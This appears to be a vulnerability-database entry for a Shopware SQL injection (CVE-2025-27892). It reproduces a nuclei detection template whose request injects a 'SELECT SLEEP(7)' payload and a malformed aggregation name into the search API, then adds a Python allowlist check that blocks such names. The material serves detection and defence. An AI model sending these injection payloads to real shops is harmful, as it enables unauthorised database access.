Shopware < 6.5.8.13 - SQL Injection

Reported 03 Jul 2026 03:01:05 by ProjectDiscovery. Type: nuclei. Source: github.com. 73 views.

Shopware versions below 6.5.8.13 have a critical SQL injection vulnerability in the API search function.

Related (family: title, published)

- Circl: CVE-2025-27892 (10 Apr 2025 14:38)
- CNNVD: Shopware Security Vulnerability (15 Apr 2025 00:00)
- CVE: CVE-2025-27892 (15 Apr 2025 00:00)
- Cvelist: CVE-2025-27892 (15 Apr 2025 00:00)
- EUVD: EUVD-2025-10294 (3 Oct 2025 20:07)
- Github Security Blog: Shopware Vulnerable to Blind SQL-injection in DAL aggregations (8 Apr 2025 16:33)
- NVD: CVE-2025-27892 (15 Apr 2025 22:15)
- OSV: GHSA-8G35-7RMW-7F59 Shopware Vulnerable to Blind SQL-injection in DAL aggregations (8 Apr 2025 16:33)
- Positive Technologies: PT-2025-15894 · Shopware · Shopware (8 Apr 2025 00:00)
- RedhatCVE: CVE-2025-27892 (17 Apr 2025 03:12)

Code
id: CVE-2025-27892

info:
  name: Shopware < 6.5.8.13 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the "aggregations" object. The "name" field of the nested object inside "aggregations" is vulnerable to SQL injection and can be exploited using SQL parameters.
  impact: |
    Authenticated attackers can execute arbitrary SQL queries through the aggregations parameter in the search API, potentially extracting sensitive data from the Shopware database.
  remediation: |
    Upgrade to Shopware version 6.5.8.13 or later, which properly sanitizes the aggregations parameter.
  reference:
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2025-001/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-27892
  classification:
    epss-score: 0.11315
    epss-percentile: 0.95444
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 6.8
    cve-id: CVE-2025-27892
    cwe-id: CWE-89
  metadata:
    max-request: 1
    vendor: shopware
    product: shopware
    verified: true
  tags: cve,cve2025,shopware,sqli,time-based-sqli,vuln

variables:
  token: "{{token}}"

http:
  - raw:
      - |
        @timeout: 30s
        POST /api/search/order HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
        Accept: */*
        Authorization: Bearer {{token}}
        Content-type: application/json

        {
          "filter": [
            {
              "type": "equals",
              "field": "transactions.stateMachineState.technicalName",
              "value": "paid` FROM `order`; SELECT SLEEP(7); -- "
            }
          ],
          "aggregations": [
            {
              "type": "histogram",
              "name": "order_sum_bucket",
              "field": "orderDateTime",
              "interval": "day",
              "aggregation": {
                "type": "sum",
                "name": "totalAmount ? ? --",
                "field": "amountTotal"
              }
            }
          ]
        }


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Warning: Undefined array")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 500'
          - 'duration>=5'
        condition: and
# digest: 4a0a004730450221009d89c33db1105b97044cb010f7c2c0ba734c0236789daad03517df886270a69d02200fba518ea45f8da8151c81b0c7ea5877e877d023cd65c2413b1e1b1f37c40d07:922c64590222798bb761d5b6d8e72950
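The template's matchers fire on the side effects of the injected `name` (a PHP "Undefined array" warning, an HTTP 500 and a delay of five seconds or more). A gateway or WAF that sits in front of the search API can refuse such requests before they reach the DAL by requiring every aggregation name, including names in nested `aggregation` objects, to be a plain identifier. The following is an added example of that allowlist check; it is not part of the nuclei template or of Shopware's own code, and the function names, the identifier pattern and the two sample request bodies are constructed for illustration.

```python
"""
Allowlist check for aggregation names in a Shopware-style DAL search request.

Added example, not code from the nuclei template or from Shopware. The
functions `find_unsafe_aggregation_names` and `is_request_safe` and the
pattern SAFE_NAME are hypothetical choices; the sample bodies are constructed
to mirror the shape of the template's request.
"""
import json
import re

# A safe aggregation name: starts with a letter, then letters, digits,
# underscore, dot or hyphen, at most 64 characters. Quotes, spaces, comment
# markers and placeholders ("?") are all rejected.
SAFE_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_.-]{0,63}$")


def find_unsafe_aggregation_names(body: dict) -> list:
    """Return (json-path, name) for every aggregation name that is not a safe
    identifier. Nested aggregations under the "aggregation" key are walked too,
    since the nested name is the one the template abuses."""
    unsafe = []

    def walk(agg: dict, path: str) -> None:
        name = agg.get("name")
        if not isinstance(name, str) or not SAFE_NAME.match(name):
            unsafe.append((path, name))
        nested = agg.get("aggregation")
        if isinstance(nested, dict):
            walk(nested, path + ".aggregation")

    aggs = body.get("aggregations", [])
    if isinstance(aggs, list):
        for i, agg in enumerate(aggs):
            if isinstance(agg, dict):
                walk(agg, f"aggregations[{i}]")
    return unsafe


def is_request_safe(raw_json: str) -> bool:
    """True only for a well-formed JSON object whose aggregation names all pass
    the allowlist. Malformed JSON is rejected rather than passed through."""
    try:
        body = json.loads(raw_json)
    except json.JSONDecodeError:
        return False
    return isinstance(body, dict) and not find_unsafe_aggregation_names(body)


# Constructed sample: a legitimate request with a benign nested aggregation.
CLEAN_BODY = {
    "filter": [{"type": "equals",
                "field": "transactions.stateMachineState.technicalName",
                "value": "paid"}],
    "aggregations": [{
        "type": "histogram", "name": "order_sum_bucket",
        "field": "orderDateTime", "interval": "day",
        "aggregation": {"type": "sum", "name": "totalAmount",
                        "field": "amountTotal"},
    }],
}
CLEAN_REQUEST_JSON = json.dumps(CLEAN_BODY)

# Constructed sample: same shape, nested name copied from the template above.
SUSPICIOUS_BODY = {
    "aggregations": [{
        "type": "histogram", "name": "order_sum_bucket",
        "field": "orderDateTime", "interval": "day",
        "aggregation": {"type": "sum", "name": "totalAmount ? ? --",
                        "field": "amountTotal"},
    }],
}
SUSPICIOUS_REQUEST_JSON = json.dumps(SUSPICIOUS_BODY)


if __name__ == "__main__":
    for label, raw in (("clean", CLEAN_REQUEST_JSON),
                       ("suspicious", SUSPICIOUS_REQUEST_JSON)):
        print(label, "-> allowed" if is_request_safe(raw) else "-> rejected")
    print(find_unsafe_aggregation_names(SUSPICIOUS_BODY))
```

The check is deliberately an allowlist rather than a blocklist of SQL tokens: the vulnerable sink concatenates the name into SQL, so the only robust gateway rule is to restrict the name to the character set a legitimate aggregation label needs. The vendor fix in 6.5.8.13 remains the actual remediation; this check is defence in depth for instances that cannot be upgraded immediately.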


Risk summary (04 Feb 2026 07:00, current): Vulners AI Score 6 (Medium risk); CVSS 3.1 6.8; EPSS 0.11315; 73 views.